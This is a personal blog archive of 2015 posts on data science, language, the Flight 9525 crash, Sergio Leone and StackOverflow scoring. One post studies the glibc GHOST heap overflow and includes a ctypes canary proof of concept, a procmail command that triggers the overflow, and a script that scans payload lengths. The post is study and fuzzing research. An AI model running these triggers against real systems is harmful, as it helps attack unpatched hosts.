(v0.1 - 2015/11/10)
I've been working as a data scientist intern for several months now. Here, I want to summarize my experience a bit and list several goals that I found important. Hopefully, I will achieve them all soon :)
I think data scientists take on several kinds of tasks: analysis, research, building internal data products, and building external data products. The goal of analysis is mainly to answer direct business and engineering questions, and a data scientist can expect a constant stream of such questions from different teams. Research tackles more difficult and complex questions in order to provide deeper insights. Some of the analysis or research results can then be turned into internal data products, mostly internal web services, so that other members of the company can reuse the analysis for their own tasks. Finally, if the methodology is reliable and the results are good, the data service can be released to the outside world as part of the company's product!
In a large company, each person can specialize in a particular area, while in a small company the data scientist typically needs to be good at everything (full snack?). But no matter the size of the company, I think the following goals are always important:
1. Code Quality. Many people think that data code only needs to run once, so it can be written in an ad hoc way. In my experience this is not true: the code will be reused, and the project will grow more and more complex. So all the usual software engineering wisdom applies to data code as well. Some extra investment in the beginning will save a significant amount of work later on.
2. Use Established Tools. One way to produce high-quality code and save time is to use established tools. This includes both development tools (e.g. IPython) and data science libraries (e.g. pandas).
3. Communication. Before working on a problem, it is important to clearly understand its purpose and the desired outcome. A lot of the time, the requester might not fully understand the complexity of the data, so simple measures, such as the mean, might not behave as expected (see the toy example after this list). After the job is done, it is equally important to convey the result to other people. The write-up, whether an email or slides, needs to be accurate and concise.
4. Feedback. Actively seek feedback from different types of people. Engineers, sales, customer managers, etc. all give very good and diverse comments, which can help you improve your workflow and spark new ideas. If you are working on a data product, build an early demo and seek feedback early.
5. Learning. There are several aspects to learning. First, learn what is going on inside the company in order to actively find new opportunities for applying data analysis; some folks might not realize that a data scientist could help with their tasks. Second, keep improving your skills, including statistics, machine learning, etc. Third, search for work related to your current project. Some data tasks are unique, but many others are similar to problems people have already solved, so learning from their experience can significantly speed up your own projects.
6. Planning. There are always many questions waiting to be answered, just as there are always many development tickets to be addressed. My experience is that it is usually impossible to finish all of them, so you need to prioritize. Also, at the beginning of a project, always start with a simple solution. A "bad habit" of people from academia is that they tend to make things overly complex... Complexity is sometimes required to get a paper published, but it is usually not your friend in a company.
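To illustrate the point about simple measures in item 3, here is a toy sketch with made-up numbers. When the data is heavily skewed, the mean can be far from what the requester has in mind, and the median (or a plot of the distribution) tells a different story:

    import pandas as pd

    # Hypothetical session durations in seconds; the numbers are invented
    # purely for illustration. Two long-running sessions dominate the mean.
    durations = pd.Series([12, 15, 14, 16, 13, 15, 14, 3600, 7200])

    print(durations.mean())    # ~1211 seconds, dominated by the two outliers
    print(durations.median())  # 15 seconds, much closer to the typical user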
I did not talk about big data, because the datasets I focus on are rather small. But again, no matter the size of the data, these goals always apply. In addition, the trend in technology is to hide more of the lower-level details so that people can put more effort into building the tower of technology higher. That means that in the future, the interfaces for analyzing small and big data should look pretty much the same.
Some interesting data science articles and blogs:
[1] The Top Mistakes Developers Make When Using Python for Big Data Analytics
https://www.airpair.com/python/posts/top-mistakes-python-big-data-analytics#3-mistake-2-not-tuning-for-performance
[2] Data Scientist: The Sexiest Job of the 21st Century
https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century/
[3] Data Research from OkCupid
http://blog.okcupid.com
Tuesday, November 10, 2015
Saturday, September 12, 2015
Language and Intelligence
Part 1 International Students
I learned from my girlfriend and her friend that, particularly for an international student, your language ability determines how intelligent you appear. Intelligence can be decomposed into two parts. The first part is whether you can understand some material and come up with good ideas, which I assume is not difficult for many students. The second part is whether you can convey your thoughts to others. Unfortunately, I have found that many international students, including myself, struggle here, because our ability to speak the language (e.g. English) can sometimes significantly limit how we express our understanding and ideas. This can give others the impression that we are not intelligent. Think of an extreme case where I am dropped into Moscow: without knowing a single word of Russian, I cannot express anything through language, so to the Russians I might as well be a complete idiot.
So it is very important to improve one's language in order to improve how others perceive one's intelligence.
Part 2 Mathematics
Many people say math is hard and that they cannot learn it well because they are not intelligent enough. But it might be the case that they have the intelligence to learn math, yet lack the language to read it. Using the example in Part 1: if I am in Moscow, I cannot book a hotel or visit the hospital, although nobody would consider these two tasks beyond a normal human being. I cannot do these things because I don't know Russian. Similarly, you cannot do math if you don't know its language. The language of math looks a little intimidating, but I think it should be no more difficult than a human language (this might relate to the Chomsky hierarchy [2]). So people who are afraid of learning math can simply view it as learning a new language. Learning a new language requires constant input and practice, which also explains why we should learn things like math constantly.
References:
[1] The Figure. http://edl.ecml.at/Portals/33/images/EDL_Logo1.jpg
[2] https://en.wikipedia.org/wiki/Chomsky_hierarchy
Thursday, March 26, 2015
Risk Analysis of the Flight 9525
The crash of Germanwings Flight 9525 is truly a great tragedy. It is even sadder to recall that there have been multiple large-scale aviation accidents, including MH370, MH17 and TNA222, in the past two years. Many people, including myself, wish we had better technologies and policies to reduce the likelihood of such events, or even prevent them completely.
In the ongoing investigation of the Flight 9525 accident, we have learned that the co-pilot locked the cockpit while the captain was outside, and then brought down the plane. The co-pilot's exact motive is unknown. Airlines apparently do test the mental condition of pilots, but so far there is no report indicating that the co-pilot was abnormal [1].
In this article, I would like to discuss how we might decrease the risk of such accidents. I am inspired by the following article written by Professor Juliette Kayyem [2]: Was 9/11 safety precaution a flaw? The title already gives away one main point: the cockpit lock-up mechanism designed to prevent 9/11-style attacks becomes a problem when one of the pilots goes rogue. The author suggests an emergency password so that no one can block access to the cockpit. I definitely think this is a good idea, but we should think deeper by considering the risks of different threats and how these risks tangle together.
There are many threats to an airplane: hijacking, mechanical errors, pilot errors and malicious pilots. Each threat has a risk value, which can be simply calculated as likelihood * impact; we will focus only on the likelihood part in this article. We want to reduce the likelihood of every threat below a certain threshold. However, this case clearly shows the difficulty: a mechanism that reduces the likelihood of one threat (hijacking, in this case) can increase the likelihood of another (a malicious pilot). In this particular case, the cockpit lock-up mechanism is not good because it pushed the likelihood of a successful malicious-pilot attack above the threshold.
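As a toy sketch of this trade-off (all numbers below are invented purely for illustration, not real estimates):

    # Hypothetical per-flight likelihoods of a successful attack, before
    # and after adding the cockpit lock-up mechanism. The made-up numbers
    # only show how one mitigation can push another threat over the line.
    threshold = 1e-7

    likelihoods = {
        "hijacking":       {"before": 5e-7, "after": 1e-8},
        "malicious pilot": {"before": 5e-8, "after": 2e-7},
    }

    for threat, l in likelihoods.items():
        status = "ok" if l["after"] <= threshold else "ABOVE THRESHOLD"
        print("%s: %.0e -> %.0e (%s)" % (threat, l["before"], l["after"], status))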
One might think the lock-up mechanism is necessary to defend against hijackers, and that we simply have to sacrifice other aspects. But I don't think so. There are many other ways to reduce the likelihood of hijacking, such as security checkpoints, on-board security guards (which I saw on Chinese domestic flights several years ago), and background checks of passengers. These lines of defense can probably reduce the likelihood of hijacking to an acceptable level. On the other hand, we do not have reliable methods to prevent malicious pilots. As discussed above, mental tests were not useful in this case at least, and due to the complexity of the job, we have to grant pilots broad authority. Being able to unlock the cockpit from outside therefore becomes an important line of defense against a malicious pilot. Unfortunately, that line of defense was turned off on Flight 9525...
Another idea is to consider self-flying airplanes; after all, we already have self-driving cars. At the very least, the airplane could become a remotely controlled drone in an emergency. This would help not only in a case like Flight 9525, but also when the pilots lose consciousness, as on Helios Airways Flight 522. But a self-flying system introduces new threats, such as software bugs or even vulnerabilities, which are major threats to all kinds of digital systems today. Should we trust humans or machines?
References:
[1] Lufthansa CEO: Germanwings copilot passed medical exams http://www.cnn.com/2015/03/26/europe/lufthansa-ceo-germanwings-crash/index.html
[2] Juliette Kayyem: Was 9/11 safety precaution a flaw? http://www.cnn.com/2015/03/26/opinions/kayyem-germanwings-co-pilot/index.html
Sunday, February 15, 2015
The Path of Sergio Leone
(v0.1)
Sergio Leone is one of my favorite movie directors. One can certainly attribute his success to genius and hard work. However, I think it is also interesting to take a look at his path of making films, as we might be able to learn something from it.
He made roughly 10 films over 25 years (1959-1984) [1]. His first two films were rather bad according to their IMDb ratings, but they probably gave him enough experience to make a better one. So he made his third, A Fistful of Dollars, in 1964. The movie was a huge success, but with one problem: he basically plagiarized the story of Yojimbo by Akira Kurosawa. Personally, I am fine with this, because he made a great film after all, and he compensated Kurosawa. More importantly, I think this step might have been necessary for a young director like him, as he lacked the experience to write a good story. Such imitation is probably the fastest way to become a master.
Since the 1964 movie was a huge success, the wise move was to make sequels: they could hone his ability further and bring reputation and money more quickly, with very little risk. So we have For a Few Dollars More (1965) and The Good, the Bad and the Ugly (1966). By then, Leone was a mature director, and it was time to climb the high mountain of his life. The previous three movies were all Westerns whose stories constrained one another; he needed to break out of the trilogy in order to fully exploit his creativity, while still drawing on his experience with Westerns. So he directed Once Upon a Time in the West in 1968, one of the greatest movies of all time. This movie also made him one of the greatest directors.
These four films had probably exhausted his creativity in Western settings, so he turned his eye to Mexico's past and produced Once Upon a Time... the Revolution in 1971. It is also a great movie; by this time, Leone had reached the top level, so it was impossible for him to make a low-quality film anymore.
Then, for the next 13 years, he stopped directing. It was probably because he was tired and needed some rest; he was also preparing his next big shot. That movie, which finally arrived in 1984, was in a completely different setting from all his previous films: Once Upon a Time in America, which follows the lives of several gangsters in New York City. I personally think this movie reaches the apex of filmmaking. The story, the acting, the scenes, the music... all are the best. He is a true master.
Then, of course, we would just expect one masterpiece after another from him until his death. However, the end of his life came rather soon, because his body could not keep up with his great mind. He died in 1989 while preparing Leningrad: The 900 Days.
I think he had a fantastic life, with invaluable contributions to humanity. I also think his path resembles that of many great minds in other fields, such as academia (e.g. replace films with research publications in the text above). I hope we can all draw some inspiration from the paths of these forebears.
Additional remarks:
- We should also emphasize the contribution of Ennio Morricone, who made superb music for Leone's movies. Their lifelong collaboration is also worth remembering.
References:
[1] http://en.wikipedia.org/wiki/Sergio_Leone#Filmography
Saturday, January 31, 2015
Notes on the GHOST Bug
The recent GHOST bug discovered in glibc is a heap buffer overflow that could potentially lead to arbitrary code execution. I was interested in learning about this bug because I am working on heap buffer overflow defenses. So I read the post written by Qualys Security Advisory, which provides an excellent explanation of it! [1]
This article contains some of my notes from studying this bug. I hope they will be helpful to others; please feel free to leave comments.
(1) Why wasn't this bug detected earlier?
It has been said that this bug has existed since 2000, so an important question is why it was not detected earlier. The Qualys article indicates that they found it through a manual code review, so the code probably had not received enough eyeballs before.
At the same time, I think this bug is fairly easy to detect by fuzzing, because both the test inputs and the oracle are very easy to create in this case. In contrast, it is probably not easy to find the Heartbleed vulnerability through fuzzing, because there both the test inputs and the oracle are hard to build.
I wrote the following simple program, which can trigger the vulnerability. We can think of it as a very simple fuzzer.
https://github.com/movingname/Toys/blob/master/C/GHOST2.c
We can use AddressSanitizer as the oracle, so I compiled the program with clang + AddressSanitizer. When I ran it, AddressSanitizer indeed reported a heap buffer overflow.
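For readers who do not want to compile the C file, here is a rough Python sketch of the same check using ctypes. It mirrors the canary trick from the Qualys advisory [1] instead of relying on AddressSanitizer; this is my illustration of the idea, not the code in the linked file:

    import ctypes

    CANARY = b"in_the_coal_mine"

    class Probe(ctypes.Structure):
        # The canary sits directly after the resolver buffer, so the few
        # overflowed bytes land on it (same trick as the Qualys PoC).
        _fields_ = [("buffer", ctypes.c_char * 1024),
                    ("canary", ctypes.c_char * (len(CANARY) + 1))]

    probe = Probe(b"buffer", CANARY)
    libc = ctypes.CDLL("libc.so.6")

    # Same length arithmetic as the advisory: subtract the 16 bytes of the
    # parsed address, two char* slots, and the terminating NUL.
    name_len = 1024 - 16 * 1 - 2 * ctypes.sizeof(ctypes.c_char_p) - 1
    name = b"0" * name_len

    resbuf = ctypes.create_string_buffer(64)  # room for struct hostent
    result = ctypes.c_void_p()
    herrno = ctypes.c_int()

    # `buffer` is at offset 0, so a pointer to the struct doubles as a
    # pointer to the buffer.
    libc.gethostbyname_r(name, resbuf, ctypes.byref(probe),
                         ctypes.c_size_t(1024),
                         ctypes.byref(result), ctypes.byref(herrno))

    print("vulnerable" if probe.canary != CANARY else "not vulnerable")

On a patched glibc, gethostbyname_r simply fails with ERANGE and the canary stays intact; on a vulnerable one, the parsed address overflows the buffer and clobbers the canary.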
I guess one could run a round of fuzzing over all functions of this kind in common libraries. Maybe more bugs would be found?
(2) procmail exploit
The article [1] shows how we can exploit this bug in procmail using
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@...ython -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
However, this command has some omissions (the ... in the middle). Actually, one can run
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
to trigger the glibc detection.
In addition, the length of the input is important. It cannot be too small, but it also cannot be too large, because procmail will detect the overflow. There is only a tiny window that triggers the overflow.
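To locate the window, one could simply scan a range of payload lengths. A rough sketch (the bounds and the error signature below are guesses that may need adjusting on your system):

    import subprocess

    # Try payload lengths around 0x500 and report which ones make procmail
    # crash or make glibc abort with a heap-corruption message.
    for n in range(0x4e0, 0x520):
        cmd = ["/usr/bin/procmail", "VERBOSE=on", "COMSAT=@" + "0" * n]
        p = subprocess.Popen(cmd, stdin=subprocess.DEVNULL,
                             stderr=subprocess.PIPE)
        _, err = p.communicate()
        if p.returncode < 0 or b"glibc detected" in err:
            print(n, "triggers the overflow")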
References:
[1] http://www.openwall.com/lists/oss-security/2015/01/27/9
Thursday, January 15, 2015
Inflation and StackOverflow.com
(v0.1)
I really enjoy asking and answering questions on StackOverflow.com, which has some exciting features. For example, it is mainly managed by the community, not by admins, so users on StackOverflow.com contribute not only information (Web 2.0) but also "computation" (Web 3.0?). Another feature is the scoring system: a user earns a score based on votes on the questions and answers she posts. This is a good incentive for users to offer their knowledge, because the score reflects one's progress and ability, and can even be used in job interviews. This second feature separates StackOverflow.com from traditional mailing-list-based Q&A.
However, this reward mechanism also comes with an issue that I call the disadvantage of late members: it is more difficult for a late member to earn the same score as an early member, mainly because early questions are in general more important yet easier to answer than late ones. For example, user X asks how to sort a dictionary in Python, and user Y easily answers. Since this question is quite common for new Python users, many users will find this answer and vote it up, so Y earns a high score from a simple answer. A year later, Z joins StackOverflow.com. Z is much more knowledgeable in Python than Y; however, there are no such easy and rewarding questions left for Z, so Z's score might never surpass Y's.
This issue could hurt participation on such sites. Newcomers may lack a strong incentive to contribute, because they can hardly find questions to answer, and they cannot catch up with the early members anyway.
Let us think about how to address this issue. I propose two simple ideas here. The first is to reduce the scores of early members over time. However, reducing someone's "possessions" sounds bad and might hurt the early members. A slightly different idea is to introduce inflation: the Q&A site increases the score granted per upvote over time, thus giving more score to new members. Maybe inflation in the economy serves a similar purpose: after some early people have accumulated a large amount of wealth, it is hard for latecomers to catch up, because the rich can get good returns simply through safe investments such as government bonds. Inflation, to some degree, could alleviate this.
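As a sketch of the inflation idea (the base score and rate below are made-up parameters, just to show the shape of the mechanism):

    # Each upvote is worth more the later it is cast, so newer members can
    # accumulate score faster. All numbers here are invented for illustration.
    SITE_LAUNCH = 2008
    INFLATION_RATE = 0.10  # upvote value grows 10% per year

    def upvote_value(year):
        """Score granted for one upvote cast in the given year."""
        return 10 * (1 + INFLATION_RATE) ** (year - SITE_LAUNCH)

    # Early answer: 100 upvotes collected in 2009.
    # Late answer: 40 upvotes collected in 2015 by a more knowledgeable user.
    early = 100 * upvote_value(2009)  # 1100 with inflation vs. 1000 flat
    late = 40 * upvote_value(2015)    # ~780 with inflation vs. 400 flat
    print(round(early), round(late))  # the gap narrows compared to flat scoring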
Actually, the solution StackOverflow.com uses now is to show a recent ranking (e.g. over the past year) alongside the overall ranking. The recent ranking is a fairer playing field for everybody. However, it is not as stable as the overall ranking, so I think the inflation idea still makes sense. Of course, StackOverflow.com can complement the recent ranking with permanent badges (e.g. a "Top 1 in one month" badge).
A related article:
Why I no longer contribute to Stackoverflow
http://michael.richter.name/blogs/why-i-no-longer-contribute-to-stackoverflow/